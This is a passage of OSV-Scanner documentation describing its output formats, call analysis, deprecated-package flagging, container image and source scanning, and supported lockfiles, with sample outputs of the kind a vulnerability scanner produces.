--- ### HTML ```bash osv-scanner scan --format html your/project/dir # OR osv-scanner scan --serve your/project/dir # Hosts HTML output at localhost port 8000 # Use the --port flag along with --serve to specify a custom port to host the output ``` The HTML output features a lot more interactivity and information compared to terminal only outputs, including: - Severity breakdown - Package and ID filtering - Vulnerability importance filtering - Full vulnerability advisory entries And additionally for container image scanning: - Layer filtering - Image layer information - Base image identification
Sample HTML output ![HTML Output Screenshot](./images/html-container-output.png)
### JSON JSON output allows you to get all the information osv-scanner found in a machine-readable format. ```bash osv-scanner scan --format json your/project/dir ``` Outputs the results as a JSON object to stdout, with all other output being directed to stderr - this makes it safe to redirect the output to a file with ```bash osv-scanner scan --format json -L path/to/lockfile > /path/to/file.json ```
Sample JSON output ```json { "results": [ { "source": { "path": "/absolute/path/to/go.mod", // One of: lockfile, sbom, git, docker "type": "lockfile" }, "packages": [ { "package": { "name": "github.com/gogo/protobuf", "version": "1.3.1", "ecosystem": "Go" }, "vulnerabilities": [ { "id": "GHSA-c3h9-896r-86jm", "aliases": ["CVE-2021-3121"] // ... Full OSV }, { "id": "GO-2021-0053", "aliases": ["CVE-2021-3121", "GHSA-c3h9-896r-86jm"] // ... Full OSV } ], // Grouping based on aliases, if two vulnerability share the same alias, or alias each other, // they are considered the same vulnerability, and is grouped here under the id field. "groups": [ { "ids": ["GHSA-c3h9-896r-86jm", "GO-2021-0053"], // Call stack analysis is done using the `--call-analysis=` flag // and result is matched against data provided by the advisory to check if // affected code is actually being executed. "experimentalAnalysis": { "GO-2021-0053": { "called": false } } } ] } ] }, { "source": { "path": "/absolute/path/to/Cargo.lock", "type": "lockfile" }, "packages": [ { "package": { "name": "regex", "version": "1.5.1", "ecosystem": "crates.io" }, "vulnerabilities": [ { "id": "GHSA-m5pq-gvj9-9vr8", "aliases": ["CVE-2022-24713"] // ... Full OSV }, { "id": "RUSTSEC-2022-0013", "aliases": ["CVE-2022-24713"] // ... Full OSV } ], "groups": [ { "ids": ["GHSA-m5pq-gvj9-9vr8", "RUSTSEC-2022-0013"] } ] } ] } ] } ```
--- ### SARIF ```bash osv-scanner scan --format sarif your/project/dir ``` Outputs the result in the [SARIF](https://sarifweb.azurewebsites.net/) v2.1.0 format. Each vulnerability (grouped by aliases) is a separate rule, and each package containing a vulnerable dependency is a rule violation. The help text within the SARIF report contains detailed information about the vulnerability and remediation instructions for how to resolve it.
Sample SARIF output ```json { "version": "2.1.0", "$schema": "https://json.schemastore.org/sarif-2.1.0.json", "runs": [ { "tool": { "driver": { "informationUri": "https://github.com/google/osv-scanner", "name": "osv-scanner", "rules": [ { "id": "CVE-2022-24713", "shortDescription": { "text": "CVE-2022-24713: " }, "fullDescription": { "text": "...", "markdown": "..." }, // Deprecated IDs field contains all alias IDs "deprecatedIds": [ "CVE-2022-24713", "RUSTSEC-2022-0013", "GHSA-m5pq-gvj9-9vr8" ], "help": { "text": "...", "markdown": "..." } } ], "version": "1.4.1" } }, "artifacts": [ { "location": { "uri": "file:///path/to/sub-rust-project/Cargo.lock" }, "length": -1 } ], "results": [ { "ruleId": "CVE-2022-24713", "ruleIndex": 0, "level": "warning", "message": { "text": "Package 'regex@1.5.1' is vulnerable to 'CVE-2022-24713' (also known as 'RUSTSEC-2022-0013', 'GHSA-m5pq-gvj9-9vr8')." }, "locations": [ { "physicalLocation": { "artifactLocation": { "uri": "file:///path/to/sub-rust-project/Cargo.lock" } } } ] } ] } ] } ```
Sample SARIF Help Text > **Your dependency is vulnerable to [CVE-2022-24713](https://osv.dev/list?q=CVE-2022-24713)** > (Also published as: [RUSTSEC-2022-0013](https://osv.dev/vulnerability/RUSTSEC-2022-0013), [GHSA-m5pq-gvj9-9vr8](https://osv.dev/vulnerability/GHSA-m5pq-gvj9-9vr8), ). > > {:.no_toc} > > ## [RUSTSEC-2022-0013](https://osv.dev/vulnerability/RUSTSEC-2022-0013) > >
> Details > > > Full advisory details... > >
> > {:.no_toc} > > ## [GHSA-m5pq-gvj9-9vr8](https://osv.dev/vulnerability/GHSA-m5pq-gvj9-9vr8) > >
> Details > > > Full advisory details... > >
> > --- > > {:.no_toc} > > ### Affected Packages > > | Source | Package Name | Package Version | > | ----------------------------------------- | ------------ | --------------- | > | lockfile:/path/to/rust-project/Cargo.lock | regex | 1.5.1 | > > {:.no_toc} > > ## Remediation > > To fix these vulnerabilities, update the vulnerabilities past the listed fixed versions below. > > {:.no_toc} > > ### Fixed Versions > > | Vulnerability ID | Package Name | Fixed Version | > | ------------------- | ------------ | ------------- | > | GHSA-m5pq-gvj9-9vr8 | regex | 1.5.5 | > | RUSTSEC-2022-0013 | regex | 1.5.5 | > > If you believe these vulnerabilities do not affect your code and wish to ignore them, add them to the ignore list in an > `osv-scanner.toml` file located in the same directory as the lockfile containing the vulnerable dependency. > > See the format and more options in our documentation here: https://google.github.io/osv-scanner/configuration/ > > Add or append these values to the following config files to ignore this vulnerability: > > `/path/to/rust-project/osv-scanner.toml` > > ``` > [[IgnoredVulns]] > id = "CVE-2022-24713" > reason = "Your reason for ignoring this vulnerability" > ```
--- ### SPDX ```bash osv-scanner scan --format spdx-2-3 --all-packages your/project/dir ``` Outputs the result in the [SPDX](https://spdx.dev/) v2.3 format. This matches OSV-Scalibr's SPDX output format. {: .note } SPDX only supports listing the packages found, and does not include vulnerability information. However, `osv-scanner` will still exit with a non-zero exit code (`1`) if any vulnerabilities are found.
Sample SPDX output ```json { "spdxVersion": "SPDX-2.3", "dataLicense": "CC0-1.0", "SPDXID": "SPDXRef-DOCUMENT", "name": "SCALIBR-generated SPDX", "documentNamespace": "https://spdx.google/uuid-placeholder-0", "creationInfo": { "creators": ["Tool: SCALIBR"], "created": "2025-08-11T02:58:42Z" }, "packages": [ { "name": "main", "SPDXID": "SPDXRef-Package-main-uuid-placeholder-1", "versionInfo": "0", "supplier": "NOASSERTION", "downloadLocation": "NOASSERTION", "filesAnalyzed": false }, { "name": "has-flag", "SPDXID": "SPDXRef-Package-has-flag-uuid-placeholder-2", "versionInfo": "4.0.0", "supplier": "NOASSERTION", "downloadLocation": "NOASSERTION", "filesAnalyzed": false, "sourceInfo": "Identified by the javascript/bunlock extractor from /path/to/bun.lock", "externalRefs": [ { "referenceCategory": "PACKAGE-MANAGER", "referenceType": "purl", "referenceLocator": "pkg:npm/has-flag@4.0.0" } ] }, { "name": "wrappy", "SPDXID": "SPDXRef-Package-wrappy-uuid-placeholder-3", "versionInfo": "1.0.2", "supplier": "NOASSERTION", "downloadLocation": "NOASSERTION", "filesAnalyzed": false, "sourceInfo": "Identified by the javascript/bunlock extractor from /path/to/bun.lock", "externalRefs": [ { "referenceCategory": "PACKAGE-MANAGER", "referenceType": "purl", "referenceLocator": "pkg:npm/wrappy@1.0.2" } ] }, { "name": "league/flysystem", "SPDXID": "SPDXRef-Package-league-flysystem-uuid-placeholder-4", "versionInfo": "1.0.8", "supplier": "NOASSERTION", "downloadLocation": "NOASSERTION", "filesAnalyzed": false, "sourceInfo": "Identified by the php/composerlock extractor from /path/to/composer.lock", "externalRefs": [ { "referenceCategory": "PACKAGE-MANAGER", "referenceType": "purl", "referenceLocator": "pkg:composer/league%2Fflysystem@1.0.8" } ] } ], "relationships": [ { "spdxElementId": "SPDXRef-DOCUMENT", "relatedSpdxElement": "SPDXRef-Package-main-uuid-placeholder-1", "relationshipType": "DESCRIBES" }, { "spdxElementId": "SPDXRef-Package-main-uuid-placeholder-1", "relatedSpdxElement": 
"SPDXRef-Package-has-flag-uuid-placeholder-2", "relationshipType": "CONTAINS" }, { "spdxElementId": "SPDXRef-Package-has-flag-uuid-placeholder-2", "relatedSpdxElement": "NOASSERTION", "relationshipType": "CONTAINS" }, { "spdxElementId": "SPDXRef-Package-main-uuid-placeholder-1", "relatedSpdxElement": "SPDXRef-Package-wrappy-uuid-placeholder-3", "relationshipType": "CONTAINS" }, { "spdxElementId": "SPDXRef-Package-wrappy-uuid-placeholder-3", "relatedSpdxElement": "NOASSERTION", "relationshipType": "CONTAINS" }, { "spdxElementId": "SPDXRef-Package-main-uuid-placeholder-1", "relatedSpdxElement": "SPDXRef-Package-league-flysystem-uuid-placeholder-4", "relationshipType": "CONTAINS" }, { "spdxElementId": "SPDXRef-Package-league-flysystem-uuid-placeholder-4", "relatedSpdxElement": "NOASSERTION", "relationshipType": "CONTAINS" } ] } ```
--- ### CycloneDX ```bash osv-scanner scan --format cyclonedx-1-5 --all-packages your/project/dir ``` Outputs the result in the [CycloneDX](https://cyclonedx.org/) format. You can also specify CycloneDX 1.4 using `--format cyclonedx-1-4`.
Sample CycloneDX output ```json { "$schema": "http://cyclonedx.org/schema/bom-1.5.schema.json", "bomFormat": "CycloneDX", "specVersion": "1.5", "version": 1, "components": [ { "bom-ref": "pkg:composer/league/flysystem@1.0.8", "type": "library", "name": "league/flysystem", "version": "1.0.8", "licenses": [], "purl": "pkg:composer/league/flysystem@1.0.8" }, { "bom-ref": "pkg:npm/has-flag@4.0.0", "type": "library", "name": "has-flag", "version": "4.0.0", "licenses": [], "purl": "pkg:npm/has-flag@4.0.0" }, { "bom-ref": "pkg:npm/wrappy@1.0.2", "type": "library", "name": "wrappy", "version": "1.0.2", "licenses": [], "purl": "pkg:npm/wrappy@1.0.2" } ], "vulnerabilities": [ { "id": "GHSA-9f46-5r25-5wfm", "references": [ { "id": "CVE-2021-32708", "source": {} } ], "ratings": [ { "method": "CVSSv3", "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" } ], "description": "Time-of-check Time-of-use (TOCTOU) Race Condition in league/flysystem", "detail": "### Impact\n\nThe whitespace normalisation using in 1.x and 2.x removes any unicode whitespace. 
Under certain specific conditions this could potentially allow a malicious user to execute code remotely.\n\nThe conditions: \n\n- A user is allowed to supply the path or filename of an uploaded file.\n- The supplied path or filename is not checked against unicode chars.\n- The supplied pathname checked against an extension deny-list, not an allow-list.\n- The supplied path or filename contains a unicode whitespace char in the extension.\n- The uploaded file is stored in a directory that allows PHP code to be executed.\n\nGiven these conditions are met a user can upload and execute arbitrary code on the system under attack.\n\n### Patches\n\nThe unicode whitespace removal has been replaced with a rejection (exception).\n\nThe library has been patched in:\n- 1.x: https://github.com/thephpleague/flysystem/commit/f3ad69181b8afed2c9edf7be5a2918144ff4ea32\n- 2.x: https://github.com/thephpleague/flysystem/commit/a3c694de9f7e844b76f9d1b61296ebf6e8d89d74\n\n### Workarounds\n\nFor 1.x users, upgrade to 1.1.4. For 2.x users, upgrade to 2.1.1.\n", "advisories": [ { "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-32708" } ], "published": "2021-06-29T03:13:28Z", "updated": "2024-02-16T08:21:35Z", "credits": { "organizations": [] }, "affects": [ { "ref": "pkg:composer/league/flysystem" } ] } ] } ```
--- ## Call analysis With the `--call-analysis=` flag enabled, call information will be included in the output. See [Scanning with call analysis](./scan-source.md#scanning-with-call-analysis) for more details on how to enable call analysis. ### Table In the table output format, call analysis info is used to split the output between vulnerabilities that affect code called by your project, and vulnerabilities that only affect code paths not called by your code. ```bash osv-scanner scan --format table --call-analysis=rust your/project/dir ```
Sample table output ```bash ╭─────────────────────────────────────┬──────┬───────────┬─────────────────┬─────────┬────────────────────╮ │ OSV URL │ CVSS │ ECOSYSTEM │ PACKAGE │ VERSION │ SOURCE │ ├─────────────────────────────────────┼──────┼───────────┼─────────────────┼─────────┼────────────────────┤ │ https://osv.dev/GHSA-qc84-gqf4-9926 │ 8.1 │ crates.io │ crossbeam-utils │ 0.6.6 │ path/to/Cargo.lock │ │ https://osv.dev/RUSTSEC-2022-0041 │ │ │ │ │ │ │ https://osv.dev/GHSA-43w2-9j62-hq99 │ 9.8 │ crates.io │ smallvec │ 1.6.0 │ path/to/Cargo.lock │ │ https://osv.dev/RUSTSEC-2021-0003 │ │ │ │ │ │ ├─────────────────────────────────────┼──────┼───────────┼─────────────────┼─────────┼────────────────────┤ │ Uncalled vulnerabilities │ │ │ │ │ │ ├─────────────────────────────────────┼──────┼───────────┼─────────────────┼─────────┼────────────────────┤ │ https://osv.dev/GHSA-xcf7-rvmh-g6q4 │ │ crates.io │ openssl │ 0.10.52 │ path/to/Cargo.lock │ │ https://osv.dev/RUSTSEC-2023-0044 │ │ │ │ │ │ ╰─────────────────────────────────────┴──────┴───────────┴─────────────────┴─────────┴────────────────────╯ ```
### JSON The JSON output will include analysis results for each vulnerability group. ```bash osv-scanner scan --format json --call-analysis=rust -L path/to/lockfile > /path/to/file.json ```
Sample JSON output ```json { "results": [ { "source": { "path": "path/to/Cargo.lock", "type": "lockfile" }, "packages": [ { "package": { "name": "crossbeam-utils", "version": "0.6.6", "ecosystem": "crates.io" }, "vulnerabilities": [ { "id": "GHSA-qc84-gqf4-9926", "aliases": ["CVE-2022-23639"] // ... Full OSV }, { "id": "RUSTSEC-2022-0041", "aliases": ["GHSA-qc84-gqf4-9926", "CVE-2022-23639"] // ... Full OSV } ], "groups": [ { // This vuln has no function info, so no call analysis done "ids": ["GHSA-qc84-gqf4-9926", "RUSTSEC-2022-0041"] } ] }, { "package": { "name": "memoffset", "version": "0.5.6", "ecosystem": "crates.io" }, "vulnerabilities": [ { "id": "GHSA-wfg4-322g-9vqv" // ... Full OSV }, { "id": "RUSTSEC-2023-0045", "aliases": ["GHSA-wfg4-322g-9vqv"] // ... Full OSV } ], "groups": [ { "ids": ["GHSA-wfg4-322g-9vqv", "RUSTSEC-2023-0045"], // RUSTSEC-2023-0045 does have function info, call analysis is performed // the vulnerable function is not called "experimentalAnalysis": { "RUSTSEC-2023-0045": { "called": false } } } ] }, { "package": { "name": "smallvec", "version": "1.6.0", "ecosystem": "crates.io" }, "vulnerabilities": [ { "id": "GHSA-43w2-9j62-hq99", "aliases": ["CVE-2021-25900"] // ... Full OSV }, { "id": "RUSTSEC-2021-0003", "aliases": ["CVE-2021-25900", "GHSA-43w2-9j62-hq99"] // ... Full OSV } ], "groups": [ { "ids": ["GHSA-43w2-9j62-hq99", "RUSTSEC-2021-0003"], // RUSTSEC-2021-0003 does have function info, call analysis is performed // the vulnerable function does get called. "experimentalAnalysis": { "RUSTSEC-2021-0003": { "called": true } } } ] } ] } ] } ```
## Return Codes | Exit Code | Reason | | :-------: | -------------------------------------------------------------------------------------------- | | `0` | Packages were found when scanning, but does not match any known vulnerabilities or findings. | | `1` | Packages were found when scanning, and there are vulnerabilities or findings. | | `1-126` | Reserved for vulnerability result related errors. | | `127` | General Error. | | `128` | No packages found (likely caused by the scanning format not picking up any files to scan). | | `129-255` | Reserved for non result related errors. | ================================================ FILE: docs/package-deprecation.md ================================================ --- layout: page permalink: /experimental/flag-deprecated-packages/ parent: Experimental Features nav_order: 4 --- # Flag Deprecated Packages Experimental {: .label } OSV-Scanner can identify and report unsupported or removed packages in dependencies. This feature leverages the [deps.dev API](https://docs.deps.dev/api/). ## Deprecation Status The `deprecated` field is a boolean value indicating if a package is flagged as unsupported. This includes states such as: - **Deprecated**: Marked as deprecated by the author. - **Yanked**: Removed from the registry. ## Usage To enable package deprecation reporting, use the `--experimental-flag-deprecated-packages` flag. The feature is not available in the `spdx` format. ### Project Source Scanning ```bash osv-scanner scan source --experimental-flag-deprecated-packages -r /path/to/project ``` For more details on source scanning, see [Project Source Scanning](./scan-source.md). 
### Container Images Scanning ```bash # Scan a local or remote image by name osv-scanner scan image --experimental-flag-deprecated-packages my-image:tag # Scan an exported image archive osv-scanner scan image --experimental-flag-deprecated-packages --archive ./path/to/my-image.tar ``` For more details on image scanning, see [Container Image Scanning](./scan-image.md). ## Output When enabled, the output reports deprecated packages as follows: - **Table, Markdown, HTML**: A dedicated section listing deprecated packages. - **JSON**: A `deprecated` field in the `package` object. - **SARIF**: A "Deprecated" column in the "Affected Packages" table. - **CycloneDX**: A `deprecated` property in `component`. If no deprecated packages are detected, the corresponding section or field is omitted.
Example JSON Output ```json { "results": [ { "source": { "path": "/path/to/lockfile", "type": "lockfile" }, "packages": [ { "package": { "name": "deprecated-package", "version": "1.0.0", "ecosystem": "npm", "deprecated": true } }, { "package": { "name": "not-deprecated-package", "version": "2.0.0", "ecosystem": "npm" } } ] } ] } ```
================================================ FILE: docs/scan-image.md ================================================ --- layout: page parent: Usage permalink: /usage/scan-image nav_order: 1 --- # Container Image Scanning {: .no_toc }
Table of contents {: .text-delta } - TOC {:toc}
OSV-Scanner analyzes container images by extracting package information and matching it against known vulnerabilities in the OSV.dev database. This helps identify potential security risks in your containerized applications. ### Prerequisites - **Docker (Optional)**: If you want to scan images directly by name (e.g., my-image:latest) without exporting them first, the docker command-line tool must be installed and available in your system's PATH. If you choose to scan exported image archives, Docker is not required. All image scanning is done with the `scan image` subcommand: ```bash osv-scanner scan image : ``` ## Scanning Methods You can scan container images using two primary methods: 1. **Direct Image Scan:** Specify the image name and tag (e.g., `my-image:latest`). OSV-Scanner will attempt to locate the image locally. If not found locally, it will attempt to pull the image from the appropriate registry using the `docker` command. ```bash osv-scanner scan image image-name:tag ``` - **How it works:** OSV-Scanner uses `docker save` to export the image to a temporary archive, which is then analyzed. No container code is executed during the scan. 2. **Scan from Exported Image Archive:** If you have already exported your container image as a Docker archive (`.tar` file), you can scan it directly using the `--archive` flag. This method does not require Docker to be installed. ```bash osv-scanner scan image --archive ./path/to/my-image.tar ``` - **How to create an image archive:** You can create an image archive using the following commands: ```bash # Using Docker docker save my-image:latest > my-image.tar # Using Podman podman save --format=docker-archive my-image:latest > my-image.tar # Other image tools: Use the docker archive format to export the tar ``` ### Usage Notes - **No other scan targets:** When using `scan image`, you cannot specify other scan targets (e.g., directories or lockfiles). 
- **Configuration Flags:** All the global configuration flags available for the `scan` command (as described in the [Usage documentation](./usage.md)) can be used with the `scan image` subcommand. This includes flags for output format, verbosity, config files, and experimental features. ## Scanning targets OSV-Scanner scans for OS packages and build artifacts, including dependency information, on the given image, and attributes them to specific layers in the container. See [Supported Artifacts](./supported_languages_and_lockfiles.md#supported-artifacts) for details on what targets are scanned. ## Output By default, OSV-Scanner provides a summarized output of the scan results, grouping vulnerabilities by package. This is designed to handle the large number of vulnerabilities often found in container images.
Sample table output ```bash Container Scanning Result (Debian GNU/Linux 12 (bookworm)): Total 20 packages affected by 105 vulnerabilities (7 Critical, 14 High, 19 Medium, 1 Low, 64 Unknown) from 2 ecosystems. 54 vulnerabilities have fixes available. Go ╭─────────────────────────────────────────────────────────────────────────────────────────────╮ │ Source:artifact:artifact/tester-built-with-1-21-0 │ ├─────────┬───────────────────┬───────────────┬────────────┬──────────────────┬───────────────┤ │ PACKAGE │ INSTALLED VERSION │ FIX AVAILABLE │ VULN COUNT │ INTRODUCED LAYER │ IN BASE IMAGE │ ├─────────┼───────────────────┼───────────────┼────────────┼──────────────────┼───────────────┤ │ stdlib │ 1.21.0 │ Fix Available │ 20 │ # 8 Layer │ -- │ ╰─────────┴───────────────────┴───────────────┴────────────┴──────────────────┴───────────────╯ ╭─────────────────────────────────────────────────────────────────────────────────────────────────────────────────╮ │ Source:artifact:src/tester │ ├─────────────────────────────┬───────────────────┬───────────────┬────────────┬──────────────────┬───────────────┤ │ PACKAGE │ INSTALLED VERSION │ FIX AVAILABLE │ VULN COUNT │ INTRODUCED LAYER │ IN BASE IMAGE │ ├─────────────────────────────┼───────────────────┼───────────────┼────────────┼──────────────────┼───────────────┤ │ github.com/gogo/protobuf │ 1.3.1 │ Fix Available │ 1 │ # 9 Layer │ -- │ │ github.com/ipfs/go-bitfield │ 1.0.0 │ Fix Available │ 1 │ # 9 Layer │ -- │ │ stdlib │ 1.19.8 │ Fix Available │ 25 │ # 9 Layer │ -- │ ╰─────────────────────────────┴───────────────────┴───────────────┴────────────┴──────────────────┴───────────────╯ Debian:12 ╭───────────────────────────────────────────────────────────────────────────────────────────────────────────╮ │ Source:os:var/lib/dpkg/status │ ├─────────────┬───────────────────┬─────────────────────────┬────────────┬──────────────────┬───────────────┤ │ PACKAGE │ INSTALLED VERSION │ FIX AVAILABLE │ VULN COUNT │ INTRODUCED LAYER │ IN BASE 
IMAGE │ ├─────────────┼───────────────────┼─────────────────────────┼────────────┼──────────────────┼───────────────┤ │ aom │ 3.6.0-1+deb12u1 │ No fix available │ 2 │ # 1 Layer │ -- │ ... │ zlib │ 1:1.2.13.dfsg-1 │ No fix available │ 1 │ # 0 Layer │ debian │ ╰─────────────┴───────────────────┴─────────────────────────┴────────────┴──────────────────┴───────────────╯ Filtered Vulnerabilities: ╭─────────────┬───────────┬───────────────────────┬─────────────────────┬────────────────╮ │ PACKAGE │ ECOSYSTEM │ INSTALLED VERSION │ FILTERED VULN COUNT │ FILTER REASONS │ ├─────────────┼───────────┼───────────────────────┼─────────────────────┼────────────────┤ │ apt │ Debian:12 │ 2.6.1 │ 1 │ Unimportant │ │ binutils │ Debian:12 │ 2.40-2 │ 8 │ Unimportant │ ... │ util-linux │ Debian:12 │ 2.38.1-5+deb12u2 │ 1 │ Unimportant │ ╰─────────────┴───────────┴───────────────────────┴─────────────────────┴────────────────╯ ```
### Detailed Output: For a more detailed view of vulnerabilities, including individual **vulnerability details**, **base image identification**, and **layer specific filters**, use the HTML output format. You can enable it using: - `--format=html`: This will output the results to an HTML file. - `--serve`: This will generate an HTML report and host it locally on `localhost:8000`. See the [Output documentation](./output.md) for more information on output formats. **Sample HTML Output**: ![Screenshot of HTML output for container image scanning](./images/html-container-output.png) ================================================ FILE: docs/scan-source.md ================================================ --- layout: page parent: Usage permalink: /usage/scan-source nav_order: 2 --- # Project Source Scanning OSV-Scanner can be used to scan your project source and lockfiles to find vulnerabilities in your dependencies. ```bash osv-scanner scan source [paths...] ``` As this is the most common use case of osv-scanner, `scan source` is the default subcommand of osv-scanner, so the above is equivalent to: ```bash osv-scanner [paths...] ``` ## General use case: scanning a directory ```bash osv-scanner scan source -r /path/to/your/dir ``` The preceding command will find lockfiles, SBOMs, and git directories in your target directory and use them to determine the dependencies to check against the OSV database for any known vulnerabilities. The recursive flag `-r` or `--recursive` will tell the scanner to search all subdirectories in addition to the specified directory. It can find additional lockfiles, dependencies, and vulnerabilities. If your project has deeply nested subdirectories, a recursive search may take a long time. ## Ignored files By default, OSV-Scanner will not scan files that are ignored by `.gitignore` files. 
All recursively scanned files are matched to a git repository (if it exists) and any matching `.gitignore` files within that repository are taken into account. There is a [known issue](https://github.com/google/osv-scanner/issues/209) that the parser does not correctly respect repository boundaries. The `--no-ignore` flag can be used to force the scanner to scan ignored files. ## Excluding Paths Experimental {: .label } You can exclude specific paths from scanning using the `--experimental-exclude` flag. This is useful for excluding test directories, documentation, or vendor directories from vulnerability scans. **Note:** This flag currently only excludes directories, not individual files. This is an experimental feature and the syntax may change in future versions. ### Syntax The flag supports three pattern types, matching the `--lockfile` flag syntax: - **Exact directory name** (no prefix or `:` prefix): Matches directories with the exact name - **Glob pattern** (`g:` prefix): Matches using glob patterns - **Regex pattern** (`r:` prefix): Matches using regular expressions ### Examples ```bash # Exclude directories named "test" or "docs" (exact match) osv-scanner scan source -r --experimental-exclude=test --experimental-exclude=docs /path/to/your/dir # Exclude using glob patterns osv-scanner scan source -r --experimental-exclude="g:**/test/**" --experimental-exclude="g:**/docs/**" /path/to/your/dir # Exclude using regex patterns osv-scanner scan source -r --experimental-exclude="r:.*_test$" /path/to/your/dir # Mix different pattern types osv-scanner scan source -r --experimental-exclude=vendor --experimental-exclude="g:**/test/**" --experimental-exclude="r:\\.cache" /path/to/your/dir # Escape directory names containing colons using : prefix osv-scanner scan source -r --experimental-exclude=":my:project" /path/to/your/dir ``` ### Common use cases - Excluding test directories: `--experimental-exclude=test` or `--experimental-exclude="g:**/test/**"` - Excluding 
documentation: `--experimental-exclude=docs` - Excluding vendor directories: `--experimental-exclude=vendor` Alternatively, you can use the `osv-scanner.toml` configuration file with `[[PackageOverrides]]` to ignore specific packages or directories. See [Configuration](./configuration.md) for more details. ## SBOM scanning SBOMs will be automatically identified so long as their name follows the specification for the particular format: - [SPDX Filenames]: - `*.spdx.json` - `*.spdx` - `*.spdx.yml` - `*.spdx.rdf` - `*.spdx.rdf.xml` - [CycloneDX Filenames]: - `bom.json` - `*.cdx.json` - `bom.xml` - `*.cdx.xml` ```bash osv-scanner scan source -L /path/to/your/sbom.spdx.json ``` [SPDX] and [CycloneDX] SBOMs using [Package URLs] are supported. [SPDX]: https://spdx.dev/ [SPDX Filenames]: https://spdx.github.io/spdx-spec/v2.3/conformance/ [CycloneDX Filenames]: https://cyclonedx.org/specification/overview/#recognized-file-patterns [CycloneDX]: https://cyclonedx.org/ [Package URLs]: https://github.com/package-url/purl-spec ## Specify Lockfile(s) If you want to check for known vulnerabilities in specific lockfiles, you can use the following command: ```bash osv-scanner scan source --lockfile=/path/to/your/package-lock.json --lockfile=/path/to/another/Cargo.lock ``` It is possible to specify more than one lockfile at a time; you can also specify how to parse an arbitrary file: ```bash osv-scanner scan source --lockfile 'requirements.txt:/path/to/your/extra-requirements.txt' ``` The list of supported lockfile formats can be found [here](./supported_languages_and_lockfiles.md). 
If the file you are scanning is located in a directory that has a colon in its name, you can prefix the path with just a colon to explicitly signal to the scanner that it should infer the parser based on the filename: ```bash osv-scanner scan source --lockfile ':/path/to/my:projects/package-lock.json' ``` ## Git Repository Scanning OSV-Scanner will automatically scan git submodules and vendored directories for C/C++ code and try to attribute them to specific dependencies and versions. See [C/C++ Scanning](./supported_languages_and_lockfiles.md#cc-scanning) for more details. By default, root git directories (i.e. git repositories that are not a submodule of a bigger git repo) are skipped. You can include those repositories by setting the `--include-git-root` flag. ## Scanning with call analysis Call stack analysis can be performed on some languages to check if the vulnerable code is actually being executed by your project. If the code is not being executed, these vulnerabilities will be marked as unexecuted. To enable call analysis in all languages, call OSV-Scanner with the `--call-analysis=all` flag. Because `all` includes Rust, the build-script warning in the Rust section below applies to it as well. By default, call analysis in Go is enabled, but you can disable it using the `--no-call-analysis=go` flag. ### Call analysis in Go OSV-Scanner uses the [`govulncheck`](https://pkg.go.dev/golang.org/x/vuln/cmd/govulncheck) library to analyze Go source code to identify called vulnerable functions. #### Additional Dependencies The `go` compiler needs to be installed and available on `PATH`. ### Call analysis in Rust Experimental {: .label } Call analysis in Rust is still considered experimental. {: .warning } > Running call analysis for Rust will execute build scripts (`build.rs`) in your dependencies as part of the compilation. > This may execute arbitrary code with the privileges of the user running OSV-Scanner, so enable it only for code you trust or inside an isolated build environment. OSV-Scanner compiles Rust source code and analyzes the output binary's DWARF debug information to identify called vulnerable functions. 
#### Additional Dependencies Rust toolchain (including `cargo`) that can compile the source code being scanned needs to be installed and available on `PATH`. The installed Rust toolchain must be capable of compiling every crate/target in the scanned code, for code with a lot of dependencies this will take a few minutes. ### Limitations Current implementation has a few limitations: - Does not support dependencies on proc-macros (Tracked in [#464](https://github.com/google/osv-scanner/issues/464)) - Does not support any dependencies that are dynamically linked - Does not support dependencies that link external non-rust code ### Example ```bash osv-scanner scan source --call-analysis=rust --no-call-analysis=go ./my/project/path ``` ================================================ FILE: docs/supported_languages_and_lockfiles.md ================================================ --- layout: page permalink: /supported-languages-and-lockfiles/ nav_order: 2 --- # Supported Artifacts and Manifests {: .no_toc }
Table of contents {: .text-delta } - TOC {:toc}
Artifact and manifest extraction logic is implemented in [OSV-Scalibr](https://github.com/google/osv-scalibr) as a standalone library. OSV-Scanner tightly integrates with OSV-Scalibr to provide an end to end vulnerability scanner for developers. ## Core Concept We split the files we can scan into two broad categories, **artifacts** and **manifests**. We found that when performing different forms of scanning, you are generally interested in different types of files. For example, when scanning your source project, you are much more interested in what your lockfiles and manifests contain, and less interested in what is installed on your development machine, or leftover compiled artifacts. However, if you are scanning a container, then what is installed is the vital piece of information, and lockfiles found on the system no longer matters if the artifacts they point to are not actually downloaded and installed. ## Supported Artifacts When scanning container images (`osv-scanner scan image ...`), OSV-Scanner automatically extracts and analyzes the following artifacts: | Source | Example files | | ------------------------------------ | ---------------------------------- | | Alpine APK packages | `/lib/apk/db/installed` | | Debian/Ubuntu dpkg/apt packages | `/var/lib/dpkg/status` | | | | | Go Binaries | `main-go` | | Rust Binaries (with cargo-auditable) | `main-rust-built-with-auditable` | | Java Uber `jars` | `my-java-app.jar` | | Node Modules | `node-app/node_modules/...` | | Python wheels | `lib/python3.11/site-packages/...` | ## Supported lockfiles/manifests When scanning source code (`osv-scanner scan source ...`), OSV-Scanner automatically extracts and analyzes the following lockfiles/manifests: | Language | Compatible Lockfile(s) | | :--------- | :----------------------------------------------------------------------------------------------------------------------------------------------------- | | C/C++ | `conan.lock`
[C/C++ commit scanning](#cc-scanning) | | Dart | `pubspec.lock` | | Elixir | `mix.lock` | | Go | `go.mod` | | Haskell | `cabal.project.freeze`
`stack.yaml.lock` | | Java | `buildscript-gradle.lockfile`
`gradle.lockfile`
`gradle/verification-metadata.xml`
`pom.xml`[\*](#transitive-dependency-scanning) | | Javascript | `bun.lock`
`package-lock.json`
`pnpm-lock.yaml`
`yarn.lock` | | .NET | `deps.json`
`packages.config`
`packages.lock.json` | | PHP | `composer.lock` | | Python | `Pipfile.lock`
`poetry.lock`
`requirements.txt`[\*](https://github.com/google/osv-scanner/issues/34)
`pdm.lock`
`pylock.toml`
`uv.lock` | | R | `renv.lock` | | Ruby | `Gemfile.lock`
